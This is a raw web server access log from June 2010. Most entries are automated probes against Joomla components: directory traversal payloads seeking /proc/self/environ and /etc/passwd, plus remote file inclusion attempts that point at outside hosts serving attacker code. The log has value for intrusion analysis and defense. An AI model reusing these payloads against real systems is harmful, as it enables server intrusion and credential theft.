209.188.90.44 - - [07/Jun/2010:02:05:52 -0500] "GET /logs/access_log.1273363200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
93.89.215.70 - - [07/Jun/2010:02:06:47 -0500] "GET /logs/access_log.1273017600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:02:06:48 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:02:06:48 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
209.188.90.44 - - [07/Jun/2010:02:06:50 -0500] "GET /logs/access_log.1274227200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:06:50 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:06:50 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:08:22 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:09:02 -0500] "GET /logs/access_log.1274313600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
91.121.75.82 - - [07/Jun/2010:02:11:44 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://halonight.net/xml/.log? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
91.121.75.82 - - [07/Jun/2010:02:11:44 -0500] "GET /logs/access_log.1274227200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://halonight.net/xml/.log? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
91.121.75.82 - - [07/Jun/2010:02:11:44 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://halonight.net/xml/.log? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.188.90.44 - - [07/Jun/2010:02:12:28 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:12:28 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
93.89.215.70 - - [07/Jun/2010:02:12:46 -0500] "GET /logs/access_log.1273363200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
121.190.102.21 - - [07/Jun/2010:02:13:18 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.190.102.21 - - [07/Jun/2010:02:13:18 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.190.102.21 - - [07/Jun/2010:02:13:19 -0500] "GET /logs/access_log.1271548800/e404.php?DOCUMENT_ROOT=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
198.171.234.115 - - [07/Jun/2010:02:13:22 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
198.171.234.115 - - [07/Jun/2010:02:13:23 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.190.102.21 - - [07/Jun/2010:02:13:48 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.190.102.21 - - [07/Jun/2010:02:13:48 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.190.102.21 - - [07/Jun/2010:02:13:49 -0500] "GET /logs/access_log.1271548800/e404.php?DOCUMENT_ROOT=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
188.72.70.56 - - [07/Jun/2010:02:14:37 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:02:14:37 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:02:14:38 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
93.89.215.70 - - [07/Jun/2010:02:19:36 -0500] "GET /logs/access_log.1274227200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:02:19:37 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:02:19:37 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
209.188.90.44 - - [07/Jun/2010:02:20:39 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
212.227.248.216 - - [07/Jun/2010:02:21:33 -0500] "GET /logs/access_log.1274832000/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:02:21:38 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:02:21:43 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.199.183 - - [07/Jun/2010:02:22:25 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.72.70.56 - - [07/Jun/2010:02:22:39 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:02:22:39 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:02:22:39 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
93.89.215.70 - - [07/Jun/2010:02:23:06 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:02:23:15 -0500] "GET /logs/access_log.1274313600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
204.236.235.245 - - [07/Jun/2010:02:23:26 -0500] "GET /tattoo/set2.htm HTTP/1.0" 200 1953 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
189.108.172.26 - - [07/Jun/2010:02:26:03 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:26:03 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:26:03 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:26:28 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
212.227.248.216 - - [07/Jun/2010:02:28:03 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.188.90.44 - - [07/Jun/2010:02:30:43 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:30:47 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:30:47 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:30:48 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
93.89.215.70 - - [07/Jun/2010:02:31:30 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
72.55.146.140 - - [07/Jun/2010:02:35:11 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:35:11 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:35:13 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:35:13 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:35:13 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:35:13 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:35:15 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:35:15 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.253.162.10 - - [07/Jun/2010:02:35:18 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:35:18 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:35:18 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:35:18 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:35:18 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:35:19 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.188.90.44 - - [07/Jun/2010:02:35:20 -0500] "GET /logs/access_log.1274313600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:35:20 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:35:20 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
72.55.146.140 - - [07/Jun/2010:02:35:20 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:35:20 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:35:20 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:35:21 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.253.162.10 - - [07/Jun/2010:02:35:25 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:35:25 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.55.146.140 - - [07/Jun/2010:02:35:26 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:35:26 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
189.108.172.26 - - [07/Jun/2010:02:35:30 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:35:31 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:35:31 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:35:31 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:35:31 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:35:31 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:35:31 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:35:34 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:35:35 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:35:35 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:35:37 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:02:35:37 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.253.162.10 - - [07/Jun/2010:02:35:39 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:35:39 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:35:39 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:35:39 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
119.63.198.26 - - [07/Jun/2010:02:35:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.188.90.44 - - [07/Jun/2010:02:35:51 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:35:51 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
87.253.162.10 - - [07/Jun/2010:02:36:03 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:36:03 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:36:03 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:36:04 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:36:04 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:36:04 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:36:04 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:02:36:06 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.55.146.140 - - [07/Jun/2010:02:36:08 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.253.162.10 - - [07/Jun/2010:02:36:09 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.55.146.140 - - [07/Jun/2010:02:36:09 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:36:09 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.253.162.10 - - [07/Jun/2010:02:36:09 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.55.146.140 - - [07/Jun/2010:02:36:10 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:02:36:10 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
